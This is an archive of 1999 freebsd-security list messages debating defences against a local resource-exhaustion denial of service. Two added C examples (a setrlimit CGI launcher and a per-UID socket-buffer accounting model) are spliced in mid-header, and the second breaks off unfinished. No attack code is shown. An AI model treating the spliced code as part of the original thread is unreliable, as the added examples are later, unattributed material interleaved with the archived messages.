From: FreeBSD -- The Power to Serve
To: Mike Tancsa
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: FW: Local DoS in FreeBSD
In-Reply-To: <3.0.5.32.19990901162052.023c18d0@staff.sentex.ca>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Explain what you mean? That is what login classes are for; you don't have to put "nobody" in a limited class if this is what you mean.. And you can set internal limits in apache if that's what you mean.. I feel you mean either one but I don't know :)

On Wed, 1 Sep 1999, Mike Tancsa wrote:

> At 02:10 PM 9/1/99 -0600, FreeBSD -- The Power to Serve wrote:
> >Exactly what I mean! Limit file descriptors, and it also uses a lot of CPU
> >time so you can limit that too.. It will never crash the system with the
> >proper limits set :). They can run it all they want.
>
> Well, that sort of helps for kids just doing ./a.out, but would you put
> accounting limits on your web server ? That seems like a nasty can of
> configuration worms one would be opening no ?
>
> ---Mike
>
> >On Wed, 1 Sep 1999, Mike Tancsa wrote:
> >
> >> At 11:49 AM 9/1/99 -0600, FreeBSD -- The Power to Serve wrote:
> >> >If you have public access users, you should have login accounting in the
> >> >first place.. and yes, it does stop it :).. I verified this on a 3.2 box
> >> >with my login accounting setup..
> >>
> >> How does accounting stop it ? Or do you mean it just discourages users
> >> from doing it ? How much overhead does accounting add to the system ?
> >> Also, limiting the amount of file descriptors can prevent it, as the 'bug'
> >> is essentially a resource starving issue (e.g. fork bomb)
> >>
> >> ---Mike
> >> ------------------------------------------------------------------------
> >> Mike Tancsa, tel 01.519.651.3400
> >> Network Administrator, mike@sentex.net
> >> Sentex Communications www.sentex.net
> >> Cambridge, Ontario Canada
>
> ------------------------------------------------------------------------
> Mike Tancsa, tel 01.519.651.3400
> Network Administrator, mike@sentex.net
> Sentex Communications www.sentex.net
> Cambridge, Ontario Canada

From owner-freebsd-security Wed Sep 1 16:01:03 1999
Delivered-To: freebsd-security@freebsd.org
Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 4708D155A5 for ; Wed, 1 Sep 1999 16:00:54 -0700 (PDT) (envelope-from mike@sentex.net)
Received: from gravel (ospf-mdt.sentex.net [205.211.164.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id SAA23466; Wed, 1 Sep 1999 18:58:15 -0400 (EDT)
Message-Id: <4.1.19990901190908.04e0af00@granite.sentex.ca>
X-Sender: mdtancsa@granite.sentex.ca
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1
Date: Wed, 01 Sep 1999 19:10:45 -0400
To: FreeBSD -- The Power to Serve
From: Mike Tancsa
Subject: Re: FW: Local DoS in FreeBSD
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To:
References: <3.0.5.32.19990901162052.023c18d0@staff.sentex.ca>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 06:04 PM 9/1/99 , FreeBSD -- The Power to Serve wrote:
>Explain what you mean? That is what login classes are for; you don't have
>to put "nobody" in a limited class if this is what you mean.. And you can
>set internal limits in apache if that's what you mean.. I feel you mean
>either one but I don't know :)

The limits that you have to set for Apache are quite low and restrictive. I am not sure if you can effectively do this in a large production webserver. There are many cases where users need more than a few file descriptors.

---Mike
**********************************************************************
Mike Tancsa, Network Admin   * mike@sentex.net
Sentex Communications Corp,  * http://www.sentex.net/mike
Cambridge, Ontario           * 01.519.651.3400
Canada                       *

From owner-freebsd-security Wed Sep 1 16:01:25 1999
Delivered-To: freebsd-security@freebsd.org
Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 2FF8A155BA for ; Wed, 1 Sep 1999 16:01:15 -0700 (PDT) (envelope-from mike@sentex.net)
Received: from gravel (ospf-mdt.sentex.net [205.211.164.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id SAA23633; Wed, 1 Sep 1999 18:59:20 -0400 (EDT)
Message-Id: <4.1.19990901191051.04e80570@granite.sentex.ca>
X-Sender: mdtancsa@granite.sentex.ca
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1
Date: Wed, 01 Sep 1999 19:11:51 -0400
To: Garrett Wollman
From: Mike Tancsa
Subject: Re: FW: Local DoS in FreeBSD
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <199909012046.QAA07324@khavrinen.lcs.mit.edu>
References:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>We have known for some time that the problem originally described
>exists, but developing an acceptable solution has been a challenge.
>Now that sockets carry around user credentials, it may perhaps not be
>as difficult as it used to be.
>
>What needs to be done is to impose a per-UID resource limit on the
>amount of socket buffer space available.

Do you think these changes would be incorporated into the 3.x branch, or strictly 4.x ?

---Mike
**********************************************************************
Mike Tancsa, Network Admin   * mike@sentex.net
Sentex Communications Corp,  * http://www.sentex.net/mike
Cambridge, Ontario           * 01.519.651.3400
Canada                       *

From owner-freebsd-security Wed Sep 1 16:08:22 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mail.ods.org (fbsd2.ods.org [205.252.42.124]) by hub.freebsd.org (Postfix) with SMTP id D91F115BC4 for ; Wed, 1 Sep 1999 16:08:10 -0700 (PDT) (envelope-from geniusj@ods.org)
Received: (qmail 48512 invoked by uid 1000); 1 Sep 1999 19:10:25 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 1 Sep 1999 19:10:25 -0000
Date: Wed, 1 Sep 1999 15:10:25 -0400 (EDT)
From: Systems Administrator
To: Nick Hibma
Cc: FreeBSD -- The Power to Serve, Mike Tancsa, freebsd-security@FreeBSD.ORG
Subject: Re: FW: Local DoS in FreeBSD
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

The average Joe doesn't run FreeBSD

------------------------------------------------------------------------------
Jason DiCioccio              | geniusj@free-bsd.org
FreeBSD - The Power to Serve | http://www.freebsd.org
                             | http://www.ods.org
------------------------------------------------------------------------------

On Wed, 1 Sep 1999, Nick Hibma wrote:

> That's one of the comments Microsoft makes when a security hole is
> discovered: switch off that, increase the security level here. It always
> makes me kind of mad, because that's not what Joe Average does or
> considers something he should do until it's too late.
>
> One of the features I like about Unix is for example free space
> available solely to the root user. It could be imagined that these
> things also apply to file handles, memory/swap space and other scarce
> resources.
>
> Nick
>
> > Exactly what I mean! Limit file descriptors, and it also uses a lot of CPU
> > time so you can limit that too.. It will never crash the system with the
> > proper limits set :). They can run it all they want.
> >
> > On Wed, 1 Sep 1999, Mike Tancsa wrote:
> >
> > > At 11:49 AM 9/1/99 -0600, FreeBSD -- The Power to Serve wrote:
> > > >If you have public access users, you should have login accounting in the
> > > >first place.. and yes, it does stop it :).. I verified this on a 3.2 box
> > > >with my login accounting setup..
> > >
> > > How does accounting stop it ? Or do you mean it just discourages users
> > > from doing it ? How much overhead does accounting add to the system ?
> > > Also, limiting the amount of file descriptors can prevent it, as the 'bug'
> > > is essentially a resource starving issue (e.g. fork bomb)
> > >
> > > ---Mike
> > > ------------------------------------------------------------------------
> > > Mike Tancsa, tel 01.519.651.3400
> > > Network Administrator, mike@sentex.net
> > > Sentex Communications www.sentex.net
> > > Cambridge, Ontario Canada
>
> --
> e-Mail: hibma@skylink.it

From owner-freebsd-security Wed Sep 1 16:09:58 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mail.ods.org (fbsd2.ods.org [205.252.42.124]) by hub.freebsd.org (Postfix) with SMTP id EC86514CD0 for ; Wed, 1 Sep 1999 16:09:52 -0700 (PDT) (envelope-from geniusj@ods.org)
Received: (qmail 48525 invoked by uid 1000); 1 Sep 1999 19:12:03 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 1 Sep 1999 19:12:03 -0000
Date: Wed, 1 Sep 1999 15:12:03 -0400 (EDT)
From: Systems Administrator
To: "L. Sassaman"
Cc: FreeBSD -- The Power to Serve, Jeff Wheat, freebsd-security@FreeBSD.ORG
Subject: Re: FW: Local DoS in FreeBSD
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

If you have it set so that it does SUID for CGI and runs it as the user or uses the user's accounting limits, it won't work.. and yes, you should set some sensible apache limits per user on that stuff, I know it's possible.

------------------------------------------------------------------------------
Jason DiCioccio              | geniusj@free-bsd.org
FreeBSD - The Power to Serve | http://www.freebsd.org
                             | http://www.ods.org
------------------------------------------------------------------------------

On Wed, 1 Sep 1999, L. Sassaman wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> On Wed, 1 Sep 1999, FreeBSD -- The Power to Serve wrote:
>
> > If you have public access users, you should have login accounting in the
> > first place.. and yes, it does stop it :).. I verified this on a 3.2 box
> > with my login accounting setup..
>
> Okay, tweak the login.conf and you stop users from issuing the attack from
> the shell. But what about someone who builds the program and uploads it
> into a cgi-bin? Are we just to stop allowing CGIs to be run if they
> require higher resource limits?
>
> L. Sassaman
>
> System Administrator                | "Even the most primitive society has
> Technology Consultant               | an innate respect for the insane."
> icq.. 10735603                      |
> pgp.. finger://ns.quickie.net/rabbi | --Mickey Rourke
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v0.9.10 (GNU/Linux)
> Comment: OpenPGP Encrypted Email Preferred.
>
> iD8DBQE3zZXMPYrxsgmsCmoRAixFAKD5invyFWxll26tuJxuJ2u7UlNjNQCgiu1b
> EnM3D/O25Wl+26pXVuRYpWM=
> =Qeqw
> -----END PGP SIGNATURE-----

From owner-freebsd-security Wed Sep 1 16:11:35 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mail.ods.org (fbsd2.ods.org [205.252.42.124]) by hub.freebsd.org (Postfix) with SMTP id 49F1F14D7D for ; Wed, 1 Sep 1999 16:11:31 -0700 (PDT) (envelope-from geniusj@ods.org)
Received: (qmail 48537 invoked by uid 1000); 1 Sep 1999 19:12:43 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 1 Sep 1999 19:12:43 -0000
Date: Wed, 1 Sep 1999 15:12:43 -0400 (EDT)
From: Systems Administrator
To: Mike Tancsa
Cc: FreeBSD -- The Power to Serve, freebsd-security@FreeBSD.ORG
Subject: Re: FW: Local DoS in FreeBSD
In-Reply-To: <4.1.19990901190908.04e0af00@granite.sentex.ca>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Yes, they need a few.. but not as many as something like that exploit uses up.. it uses them all.. you shouldn't allow users to do that

------------------------------------------------------------------------------
Jason DiCioccio              | geniusj@free-bsd.org
FreeBSD - The Power to Serve | http://www.freebsd.org
                             | http://www.ods.org
------------------------------------------------------------------------------

On Wed, 1 Sep 1999, Mike Tancsa wrote:

> At 06:04 PM 9/1/99 , FreeBSD -- The Power to Serve wrote:
> >Explain what you mean? That is what login classes are for; you don't have
> >to put "nobody" in a limited class if this is what you mean.. And you can
> >set internal limits in apache if that's what you mean.. I feel you mean
> >either one but I don't know :)
>
> The limits that you have to set for Apache are quite low and restrictive. I
> am not sure if you can effectively do this in a large production webserver.
> There are many cases where users need more than a few file descriptors.
>
> ---Mike
> **********************************************************************
> Mike Tancsa, Network Admin   * mike@sentex.net
> Sentex Communications Corp,  * http://www.sentex.net/mike
> Cambridge, Ontario           * 01.519.651.3400
> Canada                       *

From owner-freebsd-security Wed Sep 1 18:12:57 1999
Delivered-To: freebsd-security@freebsd.org
Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 93BBB1563C for ; Wed, 1 Sep 1999 18:12:54 -0700 (PDT) (envelope-from mike@sentex.net)
Received: from gravel (ospf-mdt.sentex.net [205.211.164.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id VAA18894; Wed, 1 Sep 1999 21:12:04 -0400 (EDT)
Message-Id: <4.1.19990901211618.04e87740@granite.sentex.ca>
X-Sender: mdtancsa@granite.sentex.ca
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1
Date: Wed, 01 Sep 1999 21:24:35 -0400
To: Systems Administrator
From: Mike Tancsa
Subject: Re: FW: Local DoS in FreeBSD
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To:
References:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 03:12 PM 9/1/99 , Systems Administrator wrote:
>If you have it set so that it does SUID for CGI and runs it as the user or
>uses the user's accounting limits, it won't work.. and yes, you should set
>some sensible apache limits per user on that stuff, I know it's possible.

Ok, are you talking about enabling accounting, i.e. in /etc/rc.conf

accounting_enable="NO"  # Turn on process accounting (or NO).

or are you talking about settings in /etc/login.conf ? If login.conf, and internal apache limits, what are you actually setting, and what values ? I found that descriptors had to be VERY restrictive in order to prevent the user from crashing the system.

If you have actually implemented protection against this DOS, by all means, please post to the list what you did. However, if you are only theorizing, please state so.

---Mike
**********************************************************************
Mike Tancsa, Network Admin   * mike@sentex.net
Sentex Communications Corp,  * http://www.sentex.net/mike
Cambridge, Ontario           * 01.519.651.3400
Canada                       *

From owner-freebsd-security Wed Sep 1 18:18:02 1999
Delivered-To: freebsd-security@freebsd.org
Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id F3D6615546 for ; Wed, 1 Sep 1999 18:17:55 -0700 (PDT) (envelope-from mike@sentex.net)
Received: from gravel (ospf-mdt.sentex.net [205.211.164.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id VAA19893; Wed, 1 Sep 1999 21:16:43 -0400 (EDT)
Message-Id: <4.1.19990901212536.04e852f0@granite.sentex.ca>
X-Sender: mdtancsa@granite.sentex.ca
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1
Date: Wed, 01 Sep 1999 21:29:15 -0400
To: FreeBSD -- The Power to Serve
From: Mike Tancsa
Subject: Re: FW: Local DoS in FreeBSD
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To:
References: <3.0.5.32.19990901162052.023c18d0@staff.sentex.ca>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 06:04 PM 9/1/99 , FreeBSD -- The Power to Serve wrote:
>Explain what you mean? That is what login classes are for; you don't have
>to put "nobody" in a limited class if this is what you mean.. And you can
>set internal limits in apache if that's what you mean.. I feel you mean
>either one but I don't know :)

I mean that putting the web user (in my case user webuser -- a UID <> nobody) in a login.conf set class would seemingly be very restrictive. In my tests, I had to set a user to have less than 16 open files and ~5 processes max to prevent them from crashing a 3.x stable box. These sorts of limits to me at first glance would be unworkable in apache.

---Mike

>
>On Wed, 1 Sep 1999, Mike Tancsa wrote:
>
>> At 02:10 PM 9/1/99 -0600, FreeBSD -- The Power to Serve wrote:
>> >Exactly what I mean! Limit file descriptors, and it also uses a lot of CPU
>> >time so you can limit that too.. It will never crash the system with the
>> >proper limits set :). They can run it all they want.
>>
>> Well, that sort of helps for kids just doing ./a.out, but would you put
>> accounting limits on your web server ? That seems like a nasty can of
>> configuration worms one would be opening no ?
>>
>> ---Mike
>>
>> >On Wed, 1 Sep 1999, Mike Tancsa wrote:
>> >
>> >> At 11:49 AM 9/1/99 -0600, FreeBSD -- The Power to Serve wrote:
>> >> >If you have public access users, you should have login accounting in the
>> >> >first place.. and yes, it does stop it :).. I verified this on a 3.2 box
>> >> >with my login accounting setup..
>> >>
>> >> How does accounting stop it ? Or do you mean it just discourages users
>> >> from doing it ? How much overhead does accounting add to the system ?
>> >> Also, limiting the amount of file descriptors can prevent it, as the 'bug'
>> >> is essentially a resource starving issue (e.g. fork bomb)
>> >>
>> >> ---Mike
>> >> ------------------------------------------------------------------------
>> >> Mike Tancsa, tel 01.519.651.3400
>> >> Network Administrator, mike@sentex.net
>> >> Sentex Communications www.sentex.net
>> >> Cambridge, Ontario Canada
>>
>> ------------------------------------------------------------------------
>> Mike Tancsa, tel 01.519.651.3400
>> Network Administrator, mike@sentex.net
>> Sentex Communications www.sentex.net
>> Cambridge, Ontario Canada

**********************************************************************
Mike Tancsa, Network Admin   * mike@sentex.net
Sentex Communications Corp,  * http://www.sentex.net/mike
Cambridge, Ontario           * 01.519.651.3400
Canada                       *

From owner-freebsd-security Wed Sep 1 18:20:29 1999
Delivered-To: freebsd-security@freebsd.org
Received: from tasam.com (tasam.com [206.161.83.22]) by hub.freebsd.org (Postfix) with ESMTP id 8EA66155E3 for ; Wed, 1 Sep 1999 18:20:23 -0700 (PDT) (envelope-from clash@tasam.com)
Received: from bug (hC6526B25.dhcp.vt.edu [198.82.107.37]) by tasam.com (8.9.3/8.9.3) with SMTP id VAA45852; Wed, 1 Sep 1999 21:19:59 -0400 (EDT) (envelope-from clash@tasam.com)
Message-ID: <019d01bef4e1$46125ca0$256b52c6@tasam.com>
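The last two messages from Mike Tancsa circle around one tension: a login.conf class tight enough to stop the fork/descriptor exhaustion (under 16 open files, about 5 processes in his tests) is too tight for the web server user as a whole. One way out, shown below as an added example that is not code from the thread, from FreeBSD or from Apache, is to leave the server's own limits alone and have a small launcher apply the class caps with setrlimit(2) in the forked child immediately before it execs the CGI, so only the untrusted program is bound by them. The class table, its numbers (the "webuser" row copies the ceiling reported above) and the function names are constructed for illustration; RLIMIT_NOFILE, RLIMIT_NPROC and RLIMIT_CPU are the real resource names on FreeBSD and Linux.

```c
#include <stdio.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* One row of a hypothetical class table mirroring login.conf's
 * openfiles / maxproc / cputime capabilities (constructed for this example). */
struct class_limits {
    const char *name;
    rlim_t openfiles;   /* RLIMIT_NOFILE: descriptors per process */
    rlim_t maxproc;     /* RLIMIT_NPROC:  processes for the uid   */
    rlim_t cputime;     /* RLIMIT_CPU:    CPU seconds per process */
};

/* "webuser" uses the ceiling reported in the thread (under 16 open files,
 * about 5 processes); "default" is a loose, constructed baseline. */
static const struct class_limits classes[] = {
    { "webuser", 15, 5, 30 },
    { "default", 1024, 256, RLIM_INFINITY },
};

const struct class_limits *find_class(const char *name)
{
    size_t i;
    for (i = 0; i < sizeof classes / sizeof classes[0]; i++)
        if (strcmp(classes[i].name, name) == 0)
            return &classes[i];
    return NULL;
}

/* Compute the pair to install: lower both soft and hard to `cap`, but never
 * raise either above what the process already has.  An unprivileged process
 * cannot raise its hard limit, so asking for that would fail with EPERM and
 * the CGI would end up running with no cap at all. */
struct rlimit capped_rlimit(const struct rlimit *cur, rlim_t cap)
{
    struct rlimit r;
    r.rlim_max = (cap < cur->rlim_max) ? cap : cur->rlim_max;
    r.rlim_cur = (cur->rlim_cur < r.rlim_max) ? cur->rlim_cur : r.rlim_max;
    return r;
}

static int cap_one(int resource, rlim_t cap)
{
    struct rlimit cur, want;
    if (cap == RLIM_INFINITY)
        return 0;                       /* nothing to enforce */
    if (getrlimit(resource, &cur) != 0)
        return -1;
    want = capped_rlimit(&cur, cap);
    return setrlimit(resource, &want);
}

/* Install every cap of a class in the calling process; 0 on success. */
int apply_class_limits(const struct class_limits *c)
{
    if (cap_one(RLIMIT_NOFILE, c->openfiles) != 0) return -1;
    if (cap_one(RLIMIT_NPROC, c->maxproc) != 0) return -1;
    if (cap_one(RLIMIT_CPU, c->cputime) != 0) return -1;
    return 0;
}

/* fork(), apply the class caps in the child, exec argv, wait.  Returns the
 * child's exit status (0..255), or -1 for an unknown class, a failed fork,
 * or a child killed by a signal (e.g. SIGXCPU once RLIMIT_CPU is hit). */
int run_under_class(const char *class_name, char *const argv[])
{
    const struct class_limits *c = find_class(class_name);
    pid_t pid;
    int status;

    if (c == NULL)
        return -1;
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* Caps go in before exec so the untrusted program never runs
         * unconstrained; if a cap cannot be installed, refuse to run it. */
        if (apply_class_limits(c) != 0)
            _exit(127);
        execvp(argv[0], argv);
        _exit(127);                     /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char *argv[])
{
    int rc;
    if (argc < 3) {
        fprintf(stderr, "usage: %s class program [args...]\n", argv[0]);
        return 2;
    }
    rc = run_under_class(argv[1], &argv[2]);
    if (rc < 0) {
        fprintf(stderr, "could not run %s under class %s\n", argv[2], argv[1]);
        return 1;
    }
    printf("%s exited with status %d\n", argv[2], rc);
    return rc;
}
```

Run as `./launcher webuser /path/to/cgi`. A CGI that forks or opens descriptors past its cap now fails with EAGAIN or EMFILE inside its own process, while the server that started it keeps whatever limits it needs for its own descriptors. The same structure is what a suexec-style wrapper would use if it also switched uid before exec; the uid change would go before apply_class_limits() so the caps cannot be undone by the child.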
From: "Joe Gleason"
To: "Systems Administrator", "Nick Hibma"
Cc: "FreeBSD -- The Power to Serve", "Mike Tancsa",
References:
Subject: Re: FW: Local DoS in FreeBSD
Date: Wed, 1 Sep 1999 21:19:03 -0400
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2314.1300
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

True, I consider myself an atypical Joe, but still the point is valid that FreeBSD should be fairly resilient and stable without needing to do a lot of tweaking. There is also the argument that setting restrictions by default could mess up people who don't know to look at the restrictions when something doesn't work. Some happy medium could probably be achieved.

I think I would be happy with a default config in which: the average unprivileged user could not crash the system, but they could use a lot of resources and slow the system down drastically.

Joe Gleason
Tasam

> The average Joe doesn't run FreeBSD
>
> ------------------------------------------------------------------------------
> Jason DiCioccio              | geniusj@free-bsd.org
> FreeBSD - The Power to Serve | http://www.freebsd.org
>                              | http://www.ods.org
> ------------------------------------------------------------------------------
>
> On Wed, 1 Sep 1999, Nick Hibma wrote:
>
> > That's one of the comments Microsoft makes when a security hole is
> > discovered: switch off that, increase the security level here. It always
> > makes me kind of mad, because that's not what Joe Average does or
> > considers something he should do until it's too late.
> >
> > One of the features I like about Unix is for example free space
> > available solely to the root user. It could be imagined that these
> > things also apply to file handles, memory/swap space and other scarce
> > resources.
> >
> > Nick
> >
> > > Exactly what I mean! Limit file descriptors, and it also uses a lot of CPU
> > > time so you can limit that too.. It will never crash the system with the
> > > proper limits set :). They can run it all they want.
> > >
> > > On Wed, 1 Sep 1999, Mike Tancsa wrote:
> > >
> > > > At 11:49 AM 9/1/99 -0600, FreeBSD -- The Power to Serve wrote:
> > > > >If you have public access users, you should have login accounting in the
> > > > >first place.. and yes, it does stop it :).. I verified this on a 3.2 box
> > > > >with my login accounting setup..
> > > >
> > > > How does accounting stop it ? Or do you mean it just discourages users
> > > > from doing it ? How much overhead does accounting add to the system ?
> > > > Also, limiting the amount of file descriptors can prevent it, as the 'bug'
> > > > is essentially a resource starving issue (e.g. fork bomb)
> > > >
> > > > ---Mike
> > > > ------------------------------------------------------------------------
> > > > Mike Tancsa, tel 01.519.651.3400
> > > > Network Administrator, mike@sentex.net
> > > > Sentex Communications www.sentex.net
> > > > Cambridge, Ontario Canada
> >
> > --
> > e-Mail: hibma@skylink.it

From owner-freebsd-security Wed Sep 1 19:06:59 1999
Delivered-To: freebsd-security@freebsd.org
Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id 1640B14EC0 for ; Wed, 1 Sep 1999 19:06:56 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com)
Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id TAA27155; Wed, 1 Sep 1999 19:05:38 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com)
Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id TAA04072; Wed, 1 Sep 1999 19:05:36 -0700 (PDT)
Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id TAA08666; Wed, 1 Sep 1999 19:05:35 -0700 (PDT)
From: Don Lewis
Message-Id: <199909020205.TAA08666@salsa.gv.tsc.tdk.com>
Date: Wed, 1 Sep 1999 19:05:34 -0700
In-Reply-To: Garrett Wollman "Re: FW: Local DoS in FreeBSD" (Sep 1, 4:46pm)
X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95)
To: Garrett Wollman, Nick Hibma
Subject: Re: FW: Local DoS in FreeBSD
Cc: FreeBSD -- The Power to Serve, Mike Tancsa, freebsd-security@FreeBSD.ORG
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sep 1, 4:46pm, Garrett Wollman wrote:
} Subject: Re: FW: Local DoS in FreeBSD
} < said:
}
} > One of the features I like about Unix is for example free space
} > available solely to the root user. It could be imagined that these
} > things also apply to file handles, memory/swap space and other scarce
} > resources.
}
} We have known for some time that the problem originally described
} exists, but developing an acceptable solution has been a challenge.
} Now that sockets carry around user credentials, it may perhaps not be
} as difficult as it used to be.
}
} What needs to be done is to impose a per-UID resource limit on the
} amount of socket buffer space available.
}
} What's not clear is:
}
} 1) At what level do you impose this limit?
}
} 2) Should the limit be statistical or exact?
}
} 3) What is a sensible default value?

A fairly simple, short term measure would be to have a per-UID limit on the size of socket buffers. Most processes don't need huge buffers, and this would allow you to relax the per-UID limits on descriptors and processes for an equivalent level of resource consumption. Maybe there should be a potentially tighter per-UID limit on sockets than the overall descriptor limit, since sockets consume quite a bit more kernel resources than descriptors.

It should be possible to track the overall socket buffer space for each UID, but how do you enforce the limit? Do you cause the socket(), socketpair(), accept(), and setsockopt() calls to fail? Will userland code react well to this? Do you enforce an mbuf limit and block write()/send*() when the limit is reached? What about packets received over the network, do they get tossed? Do you kill the process with the most mbufs when a shortage occurs ;-)

Any resemblance to the swap overcommit debate is intended.

From owner-freebsd-security Wed Sep 1 19:12:03 1999
Delivered-To: freebsd-security@freebsd.org
Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 770B514EC0 for ; Wed, 1 Sep 1999 19:11:59 -0700 (PDT) (envelope-from mike@sentex.net)
Received: from gravel (ospf-mdt.sentex.net [205.211.164.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id WAA01039; Wed, 1 Sep 1999 22:10:38 -0400 (EDT)
Message-Id: <4.1.19990901222200.04560100@granite.sentex.ca>
X-Sender: mdtancsa@granite.sentex.ca
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1
Date: Wed, 01 Sep 1999 22:23:10 -0400
To: Don Lewis
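A user-space model, added here and not part of the thread or of FreeBSD, of the per-UID socket-buffer accounting Garrett Wollman proposes and Don Lewis asks how to enforce. It takes concrete positions on two of the open questions: the limit is exact, checked on every charge rather than sampled, and it is enforced at allocation time by refusing the charge with ENOBUFS, which is what a socket(), accept() or SO_SNDBUF setsockopt() caller would then see. It also holds a slice of the pool back for root, Nick Hibma's reserved-blocks analogy applied to buffer space. The structure, function names, fixed-size table and all sizes are constructed for illustration; in a kernel this state would hang off the credential that sockets carry.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define SB_MAX_UIDS 64

/* Constructed model of per-uid socket-buffer accounting. */
struct sb_acct { uint32_t uid; uint64_t used; int live; };

struct sb_pool {
    uint64_t total;     /* whole socket-buffer budget, in bytes */
    uint64_t reserve;   /* slice of `total` only uid 0 may use   */
    uint64_t per_uid;   /* exact cap for each non-root uid       */
    uint64_t in_use;    /* sum of every live charge              */
    struct sb_acct acct[SB_MAX_UIDS];
};

void sb_init(struct sb_pool *p, uint64_t total, uint64_t reserve, uint64_t per_uid)
{
    size_t i;
    p->total = total;
    p->reserve = reserve < total ? reserve : total;
    p->per_uid = per_uid;
    p->in_use = 0;
    for (i = 0; i < SB_MAX_UIDS; i++) p->acct[i].live = 0;
}

/* Find the uid's row, optionally creating it in a free slot. */
static struct sb_acct *sb_slot(struct sb_pool *p, uint32_t uid, int create)
{
    size_t i;
    struct sb_acct *free_slot = NULL;
    for (i = 0; i < SB_MAX_UIDS; i++) {
        if (p->acct[i].live && p->acct[i].uid == uid) return &p->acct[i];
        if (!p->acct[i].live && free_slot == NULL) free_slot = &p->acct[i];
    }
    if (!create || free_slot == NULL) return NULL;
    free_slot->uid = uid; free_slot->used = 0; free_slot->live = 1;
    return free_slot;
}

uint64_t sb_used(struct sb_pool *p, uint32_t uid)
{
    struct sb_acct *a = sb_slot(p, uid, 0);
    return a ? a->used : 0;
}

/* Charge `bytes` of socket-buffer space to `uid`.  Exact enforcement: the
 * request either fits entirely or is refused with -ENOBUFS.  Non-root uids
 * are bounded twice, by their own cap and by the shared pool minus the root
 * reserve; root is bounded only by the whole pool.  Comparisons are written
 * as "room left" so an oversized request cannot wrap the arithmetic. */
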